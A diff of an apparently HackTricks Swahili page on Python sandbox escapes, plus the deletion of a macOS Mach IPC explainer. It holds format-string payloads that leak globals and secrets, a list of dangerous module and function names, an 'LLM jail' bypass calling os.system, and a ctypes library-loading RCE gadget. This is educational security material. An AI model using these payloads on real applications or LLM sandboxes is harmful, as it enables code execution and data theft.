@ -510,7 +511,7 @@ builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalE
pdb:
"""
```
Zaidi ya hayo, ikiwa unadhani **maktaba nyingine** zinaweza kuwa na uwezo wa **kuwaita functions ili kutekeleza amri**, tunaweza pia **kusefa kwa majina ya functions** ndani ya maktaba zinazowezekana:
Zaidi ya hayo, ikiwa unadhani **other libraries** zinaweza **invoke functions to execute commands**, tunaweza pia **filter by functions names** ndani ya libraries zinazowezekana:
```python
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
@ -543,10 +544,10 @@ execute:
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
"""
```
## Utafutaji wa Kurudiwa wa Builtins, Globals...
## Utafutaji wa Rekursivu wa builtins, globals...
> [!WARNING]
> Hii ni **mazingana**. **Ikiwa unatafuta kitu kama globals, builtins, open au chochote** tumia tu script hii ili **kutafuta kwa kurudiwa maeneo ambako unaweza kupata kitu hicho.**
> Hii ni **ajabu**. Ikiwa unatafuta **object kama globals, builtins, open au chochote**, tumia tu script hii ili **kutafuta kwa njia ya rekursivu maeneo ambapo unaweza kupata object hiyo.**
```python
import os, sys # Import these to find more gadgets
@ -662,7 +663,7 @@ print(SEARCH_FOR)
if __name__ == "__main__":
main()
```
You can check the output of this script on this page:
Unaweza kuangalia matokeo ya script hii kwenye ukurasa huu:
{{#ref}}
@ -671,7 +672,7 @@ https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-
## Python Format String
Iwapo **utatuma** **string** kwa python ambayo **itakayofomatiwa**, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano iliyotangulia kufikia globals au builtins, kwa mfano.
Ikiwa **utatuma** **string** kwa python ambayo itakayofomatiwa, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano iliyotangulia kufikia globals au builtins, kwa mfano.
```python
# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
@ -691,11 +692,11 @@ people = PeopleInfo('GEEKS', 'FORGEEKS')
st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)
```
Angalia jinsi unavyoweza **kupata sifa** kwa njia ya kawaida kwa **dot** kama `people_obj.__init__` na **kipengee cha dict** kwa **parenthesis** bila nukuu `__globals__[CONFIG]`
Angalia jinsi unaweza **kupata sifa** kwa njia ya kawaida kwa kutumia **dot** kama `people_obj.__init__` na **kipengee cha dict** kwa **mabano** bila nukuu `__globals__[CONFIG]`
Pia kumbuka kwamba unaweza kutumia `.__dict__` kuorodhesha vipengele vya kitu `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Pia kumbuka kuwa unaweza kutumia `.__dict__` kuorodhesha vipengele vya kitu `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Tabia nyingine za kuvutia za format strings ni uwezekano wa **kutekeleza** **kazi** za **`str`**, **`repr`** na **`ascii`** kwenye kitu kilichoainishwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** mtawalia:
Vipengele vingine vya kuvutia vya format strings ni uwezekano wa **kuendesha** **functions** `str`, `repr` na `ascii` kwenye kitu kilichoelezwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** mtawalia:
```python
st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)
@ -714,14 +715,14 @@ return 'HAL 9000'
**Mifano zaidi** kuhusu **format** **string** yanaweza kupatikana kwenye [**https://pyformat.info/**](https://pyformat.info)
> [!CAUTION]
> Angalia pia ukurasa ufuatao kwa ajili ya gadgets zitakazosoma **taarifa nyeti kutoka kwa Python internal objects**:
> Angalia pia ukurasa ufuatao kwa gadgets ambazo zinaweza kusoma **taarifa nyeti kutoka kwa vitu vya ndani vya Python**:
{{#ref}}
../python-internal-read-gadgets.md
{{#endref}}
### Payloads za Kufichua Taarifa Nyeti
### Payloads za Ufunuo wa Taarifa Nyeti
```python
{whoami.__class__.__dict__}
{whoami.__globals__[os].__dict__}
@ -739,20 +740,20 @@ str(x) # Out: clueless
```
### LLM Jails bypass
From [here](https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce): `().class.base.subclasses()[108].load_module('os').system('dir')`
Kutoka [here](https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce): `().class.base.subclasses()[108].load_module('os').system('dir')`
### From format to RCE loading libraries
According to the [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) it's possible to load arbitrary libraries from disk abusing the format string vulnerability in python.
Kulingana na [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) inawezekana kupakia libraries yoyote kutoka disk kwa kutumia udhaifu wa format string katika python.
As reminder, every time an action is performed in python some function is executed. For example `2*3` will execute **`(2).mul(3)`** or **`{'a':'b'}['a']`** will be **`{'a':'b'}.__getitem__('a')`**.
Kumbuka, kila wakati tendo linapofanywa katika python fonksheni fulani hufanywa. Kwa mfano `2*3` itatekeleza **`(2).mul(3)`** au **`{'a':'b'}['a']`** itakuwa **`{'a':'b'}.__getitem__('a')`**.
You have more like this in the section [**Python execution without calls**](#python-execution-without-calls).
Una zaidi kama hizi katika sehemu [**Python execution without calls**](#python-execution-without-calls).
A python format string vuln doesn't allow to execute function (it's doesn't allow to use parenthesis), so it's not possible to get RCE like `'{0.system("/bin/sh")}'.format(os)`.\
However, it's possible to use `[]`. Therefore, if a common python library has a **`__getitem__`** or **`__getattr__`** method that executes arbitrary code, it's possible to abuse them to get RCE.
Python format string vuln hauruhusu kutekeleza function (haiwezi kutumia parenthesis), kwa hivyo haiwezekani kupata RCE kama `'{0.system("/bin/sh")}'.format(os)`.\
Hata hivyo, inawezekana kutumia `[]`. Kwa hiyo, ikiwa maktaba ya kawaida ya python ina method ya **`__getitem__`** au **`__getattr__`** inayotekeleza code yoyote, inawezekana kuziabusu kupata RCE.
Looking for a gadget like that in python, the writeup purposes this [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Where he found this [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
Akitafuta gadget kama hiyo katika python, writeup ilipendekeza hii [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Ambapo alipata hii [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
```python
class LibraryLoader(object):
def __init__(self, dlltype):
@ -774,20 +775,20 @@ return getattr(self, name)
cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL)
```
Kifaa hiki kinaruhusu **kupakia maktaba kutoka diski**. Kwa hiyo, inahitajika kwa namna fulani **kuandika au kupakia maktaba ili ipakiwe**, iliyokusanywa kwa usahihi kwenye seva iliyoshambuliwa.
Kifaa hiki kinawawezesha **kupakia maktaba kutoka diski**. Kwa hivyo, inahitajika kwa namna fulani **kuandika au kupakia maktaba itakayopakiwa**, na kuhakikisha imekomilishwa ipasavyo kwa seva iliyoshambuliwa.
```python
'{i.find.__globals__[so].mapperlib.sys.modules[ctypes].cdll[/path/to/file]}'
```
Changamoto hii kwa kweli inatumia udhaifu mwingine kwenye server unaoruhusu kuunda mafaili yoyote kwenye diski ya server.
Changamoto hii kwa kweli inatumia udhaifu mwingine kwenye server unaoruhusu kuunda faili za aina yoyote kwenye diski ya server.
## Kuchambua Python Objects
> [!TIP]
> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani soma chapisho hiki **nzuri** kuhusu mada: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani soma chapisho hiki **ajabu** kuhusu mada hiyo: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
Katika baadhi ya CTFs unaweza kupatiwa jina la **custom function where the flag** na unahitaji kuona **internals** za **function** ili kuipata.
Katika baadhi ya CTFs unaweza kupewa jina la **custom function where the flag** na unahitaji kuona the **internals** za **function** ili kuitoa.
Hii ndio function ya kuchunguza:
Hii ndiyo function ya kuchunguza:
```python
def get_flag(some_input):
var1=1
@ -807,7 +808,7 @@ dir(get_flag) #Get info tof the function
```
#### globals
`__globals__` and `func_globals`(Same) Hupata mazingira ya global. Katika mfano unaweza kuona baadhi ya imported modules, baadhi ya global variables na yaliyomo yao yaliyotangazwa:
`__globals__` and `func_globals`(Sawa) hupata mazingira ya global. Katika mfano unaweza kuona baadhi ya imported modules, baadhi ya global variables na yaliyomo yameelezwa:
```python
get_flag.func_globals
get_flag.__globals__
@ -880,7 +881,7 @@ get_flag.__code__.co_freevars
get_flag.__code__.co_code
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
```
### **Kupasua function**
### **Disassembly ya function**
```python
import dis
dis.dis(get_flag)
@ -908,7 +909,7 @@ dis.dis(get_flag)
44 LOAD_CONST 0 (None)
47 RETURN_VALUE
```
Kumbuka kwamba **kama huwezi import `dis` katika python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake ndani ya mashine yako. Hautaona yaliyomo ya variables zinazopakiwa (`LOAD_CONST`) lakini unaweza kuyakisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST` pia inaonyesha offset ya variable inayopakiwa.
Kumbuka kwamba **ikiwa huwezi import `dis` katika python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake kwenye mashine yako. Hautaona maudhui ya variables zinazopakiwa (`LOAD_CONST`) lakini unaweza kuzikisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST`also inaonyesha offset ya variable inayopakiwa.
```python
dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
0 LOAD_CONST 1 (1)
@ -930,10 +931,10 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
44 LOAD_CONST 0 (0)
47 RETURN_VALUE
```
## Compiling Python
## Kujenga Python
Sasa, tuchukulie kwamba kwa namna fulani unaweza **dump the information about a function that you cannot execute** lakini unahitaji **kuitekeleza**.\
Kama katika mfano ufuatao, unaweza **kupata code object** ya function hiyo, lakini kwa kusoma tu disassemble haujui jinsi ya kuhesabu flag (_fikiria `calc_flag` function ngumu zaidi_)
Sasa, hebu tufikirie kwamba kwa namna fulani unaweza **dump the information about a function that you cannot execute** lakini **unahitaji** **kuitekeleza**.\
Kama katika mfano ufuatao, unaweza **can access the code object** ya function hiyo, lakini kwa kusoma tu disassemble haufahamu jinsi ya kuhesabu flag (_imagine a more complex `calc_flag` function_)
```python
def get_flag(some_input):
var1=1
@ -948,7 +949,7 @@ return "Nope"
```
### Kuunda code object
Kwanza kabisa, tunahitaji kujua **jinsi ya kuunda na ku-execute code object** ili tuweze kuunda moja ili ku-execute function yetu leaked:
Kwanza kabisa, tunahitaji kujua **jinsi ya kuunda na kuendesha code object** ili tuweze kuunda moja ili kuendesha function yetu leaked:
```python
code_type = type((lambda: None).__code__)
# Check the following hint if you get an error in calling this
@ -968,7 +969,7 @@ mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
```
> [!TIP]
> Kutegemea toleo la python, **parameters** za `code_type` zinaweza kuwa na **mpangilio tofauti**. Njia bora ya kujua mpangilio wa params katika toleo la python unalolotumia ni kuendesha:
> Kulingana na toleo la python the **vigezo** of `code_type` may have a **mpangilio tofauti**. Njia bora ya kujua mpangilio wa vigezo katika toleo la python unayotumia ni kuendesha:
>
> ```
> import types
@ -976,10 +977,10 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
> 'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.'
> ```
### Kuunda upya leaked function
### Recreating a leaked function
> [!WARNING]
> Katika mfano ufuatao, tutachukua data yote inayohitajika kuunda upya function kutoka kwa function code object moja kwa moja. Katika **mfano halisi**, zote **values** zinazohitajika kutekeleza function **`code_type`** ndizo ambazo **utahitaji leak**.
> Katika mfano ufuatao, tutachukua data zote zinazohitajika moja kwa moja kutoka kwa function code object ili kuunda tena function. Katika **mfano halisi**, yote ya **maadili** ya kuendesha function **`code_type`** ndizo ambazo **utahitaji leak**.
```python
fc = get_flag.__code__
# In a real situation the values like fc.co_argcount are the ones you need to leak
@ -990,12 +991,12 @@ mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag
```
### Kupita Ulinzi
### Kwepa Ulinzi
Katika mifano iliyotangulia mwanzoni mwa chapisho hili, unaweza kuona **jinsi ya kutekeleza code yoyote ya python ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kutekeleza whole scripts** zenye loops na kila kitu katika **one liner** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
Hata hivyo, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye local machine na kui-execute kwenye **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function kwenye CTF).
Katika mifano ya awali mwanzoni mwa chapisho hili, unaweza kuona **jinsi ya kuendesha python code yoyote ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kuendesha whole scripts** na loops na kila kitu katika **one liner** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
Kwa kawaida, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye local machine na kuitekeleza katika **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function katika CTF).
Kwa mfano, hebu tufanye compile na execute kwa mkono function inayosoma _./poc.py_:
Kwa mfano, hebu tuchapishe na kutekeleza kwa mkono function inayosoma _./poc.py_:
```python
#Locally
def read():
@ -1022,7 +1023,7 @@ mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()
```
Ikiwa huwezi kufikia `eval` au `exec` unaweza kuunda **function sahihi**, lakini kuiita moja kwa moja kawaida itashindwa na: _constructor not accessible in restricted mode_. Kwa hivyo unahitaji **function isiyo katika mazingira yaliyopunguzwa ili kuiita function hii.**
Ikiwa huwezi kufikia `eval` au `exec` unaweza kuunda **proper function**, lakini kuitwa moja kwa moja kwa kawaida itashindwa na: _constructor not accessible in restricted mode_. Hivyo utahitaji **function not in the restricted environment to call this function.**
```python
#Compile a regular print
ftype = type(lambda: None)
@ -1030,9 +1031,9 @@ ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
```
## Ku-decompile Python Iliyokompilishwa
## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
Kwa kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com) mtu anaweza **decompile** msimbo wa python uliokomilishwa.
**Angalia mafunzo haya**:
@ -1045,7 +1046,7 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o
### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Python inayotekelezwa kwa uboreshaji kwa param `-O` itaondoa assert statements na msimbo wowote unaotegemea thamani ya **debug**.\
Kwa hivyo, ukaguzi kama
```python
def check_permission(super_user):
@ -1055,9 +1056,9 @@ print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
```
itaepukika
itapita kando
## Marejeleo
## Marejeo
- [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
- [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)

836
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View File

@ -1,836 +0,0 @@
# macOS IPC - Mawasiliano kati ya Mchakato
{{#include ../../../../banners/hacktricks-training.md}}
## Ujumbe wa Mach kupitia Bandari
### Taarifa za Msingi
Mach inatumia **kazi** kama **kitengo kidogo** cha kushiriki rasilimali, na kila kazi inaweza kuwa na **nyuzi nyingi**. Hizi **kazi na nyuzi zimepangwa 1:1 na michakato na nyuzi za POSIX**.
Mawasiliano kati ya kazi hufanyika kupitia Mawasiliano ya Kati ya Mchakato ya Mach (IPC), ikitumia njia za mawasiliano za upande mmoja. **Ujumbe unahamishwa kati ya bandari**, ambazo zinafanya kazi kama **foleni za ujumbe** zinazodhibitiwa na kernel.
Kila mchakato una **meza ya IPC**, ambapo inawezekana kupata **bandari za mach za mchakato**. Jina la bandari ya mach kwa kweli ni nambari (kiashiria kwa kitu cha kernel).
Mchakato pia unaweza kutuma jina la bandari pamoja na haki fulani **kwa kazi tofauti** na kernel itafanya kuonekana kwa kuingia hii katika **meza ya IPC ya kazi nyingine**.
### Haki za Bandari
Haki za bandari, ambazo zinaelezea ni shughuli zipi kazi inaweza kufanya, ni muhimu kwa mawasiliano haya. Haki zinazowezekana za **bandari** ni ([mafafanuo kutoka hapa](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
- **Haki ya Kupokea**, ambayo inaruhusu kupokea ujumbe uliopelekwa kwa bandari. Bandari za Mach ni MPSC (mzalishaji-mwingi, mtumiaji-mmoja) foleni, ambayo inamaanisha kuwa kunaweza kuwa na **haki moja ya kupokea kwa kila bandari** katika mfumo mzima (kinyume na mabomba, ambapo michakato mingi inaweza kuwa na viashiria vya faili kwa mwisho wa kusoma wa bomba moja).
- **Kazi yenye Haki ya Kupokea** inaweza kupokea ujumbe na **kuunda Haki za Kutuma**, ikiruhusu kutuma ujumbe. Awali, tu **kazi yake mwenyewe ina Haki ya Kupokea juu ya bandari yake**.
- **Haki ya Kutuma**, ambayo inaruhusu kutuma ujumbe kwa bandari.
- Haki ya Kutuma inaweza **kuigwa** hivyo kazi inayomiliki Haki ya Kutuma inaweza kuiga haki hiyo na **kuipatia kazi ya tatu**.
- **Haki ya Kutuma-mara moja**, ambayo inaruhusu kutuma ujumbe mmoja kwa bandari na kisha inatoweka.
- **Haki ya Seti ya Bandari**, ambayo inaashiria _seti ya bandari_ badala ya bandari moja. Kuondoa ujumbe kutoka kwa seti ya bandari kunamaanisha kuondoa ujumbe kutoka kwa moja ya bandari inazozishikilia. Seti za bandari zinaweza kutumika kusikiliza kwenye bandari kadhaa kwa wakati mmoja, kama `select`/`poll`/`epoll`/`kqueue` katika Unix.
- **Jina la Kufa**, ambalo si haki halisi ya bandari, bali ni tu nafasi ya kuweka. Wakati bandari inaharibiwa, haki zote zilizopo za bandari kwa bandari hiyo zinageuka kuwa majina ya kufa.
**Kazi zinaweza kuhamasisha Haki za KUTUMA kwa wengine**, na kuwapa uwezo wa kutuma ujumbe nyuma. **Haki za KUTUMA pia zinaweza kuigwa, hivyo kazi inaweza kuiga na kutoa haki kwa kazi ya tatu**. Hii, pamoja na mchakato wa kati unaojulikana kama **seva ya bootstrap**, inaruhusu mawasiliano bora kati ya kazi.
### Bandari za Faili
Bandari za faili zinaruhusu kufunga viashiria vya faili katika bandari za Mac (kwa kutumia haki za bandari za Mach). Inawezekana kuunda `fileport` kutoka kwa FD iliyotolewa kwa kutumia `fileport_makeport` na kuunda FD kutoka kwa fileport kwa kutumia `fileport_makefd`.
### Kuanzisha mawasiliano
#### Hatua:
Kama ilivyotajwa, ili kuanzisha njia ya mawasiliano, **seva ya bootstrap** (**launchd** katika mac) inahusika.
1. Kazi **A** inaanzisha **bandari mpya**, ikipata **haki ya KUPOKEA** katika mchakato.
2. Kazi **A**, ikiwa ni mmiliki wa haki ya KUPOKEA, **inazalisha haki ya KUTUMA kwa bandari**.
3. Kazi **A** inaweka **kiunganishi** na **seva ya bootstrap**, ikitoa **jina la huduma ya bandari** na **haki ya KUTUMA** kupitia utaratibu unaojulikana kama usajili wa bootstrap.
4. Kazi **B** inashirikiana na **seva ya bootstrap** ili kutekeleza **kuangalia huduma** kwa jina. Ikiwa inafanikiwa, **seva inachukua haki ya KUTUMA** iliyopokelewa kutoka Kazi A na **kuhamasisha kwa Kazi B**.
5. Baada ya kupata haki ya KUTUMA, Kazi **B** ina uwezo wa **kuunda** ujumbe na kupeleka **kwa Kazi A**.
6. Kwa mawasiliano ya pande mbili, kawaida kazi **B** inazalisha bandari mpya yenye **haki ya KUPOKEA** na **haki ya KUTUMA**, na inatoa **haki ya KUTUMA kwa Kazi A** ili iweze kutuma ujumbe kwa KAZI B (mawasiliano ya pande mbili).
Seva ya bootstrap **haiwezi kuthibitisha** jina la huduma linalodaiwa na kazi. Hii inamaanisha kuwa **kazi** inaweza kwa urahisi **kujifanya kama kazi yoyote ya mfumo**, kama kudai kwa uwongo jina la huduma ya idhini na kisha kuidhinisha kila ombi.
Kisha, Apple inahifadhi **majina ya huduma zinazotolewa na mfumo** katika faili za usanidi salama, zilizoko katika **directories zilizolindwa na SIP**: `/System/Library/LaunchDaemons` na `/System/Library/LaunchAgents`. Pamoja na kila jina la huduma, **binary inayohusiana pia inahifadhiwa**. Seva ya bootstrap, itaunda na kushikilia **haki ya KUPOKEA kwa kila moja ya majina haya ya huduma**.
Kwa huduma hizi zilizowekwa awali, **mchakato wa kuangalia unabadilika kidogo**. Wakati jina la huduma linatafutwa, launchd inaanzisha huduma hiyo kwa njia ya kidinamik. Mchakato mpya ni kama ifuatavyo:
- Kazi **B** inaanzisha **kuangalia** kwa jina la huduma.
- **launchd** inakagua ikiwa kazi inafanya kazi na ikiwa haifanyi, **inaanzisha**.
- Kazi **A** (huduma) inafanya **kuangalia kwa bootstrap**. Hapa, seva ya **bootstrap** inaunda haki ya KUTUMA, inashikilia, na **kuhamasisha haki ya KUPOKEA kwa Kazi A**.
- launchd inachukua **haki ya KUTUMA na kupeleka kwa Kazi B**.
- Kazi **B** inazalisha bandari mpya yenye **haki ya KUPOKEA** na **haki ya KUTUMA**, na inatoa **haki ya KUTUMA kwa Kazi A** (huduma) ili iweze kutuma ujumbe kwa KAZI B (mawasiliano ya pande mbili).
Hata hivyo, mchakato huu unatumika tu kwa kazi za mfumo zilizowekwa awali. Kazi zisizo za mfumo bado zinafanya kazi kama ilivyoelezwa awali, ambayo inaweza kuruhusu kujifanya.
### Ujumbe wa Mach
[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
Funguo la `mach_msg`, kimsingi ni wito wa mfumo, linatumika kwa kutuma na kupokea ujumbe wa Mach. Funguo inahitaji ujumbe utakaotumwa kama hoja ya awali. Ujumbe huu lazima uanze na muundo wa `mach_msg_header_t`, ukifuatwa na maudhui halisi ya ujumbe. Muundo umefafanuliwa kama ifuatavyo:
```c
typedef struct {
mach_msg_bits_t msgh_bits;
mach_msg_size_t msgh_size;
mach_port_t msgh_remote_port;
mach_port_t msgh_local_port;
mach_port_name_t msgh_voucher_port;
mach_msg_id_t msgh_id;
} mach_msg_header_t;
```
Mchakato unaomiliki _**kupokea haki**_ unaweza kupokea ujumbe kwenye bandari ya Mach. Kinyume chake, **watumaji** wanapewa _**tuma**_ au _**tuma-mara moja haki**_. Haki ya tuma-mara moja ni ya kutuma ujumbe mmoja tu, baada ya hapo inakuwa batili.
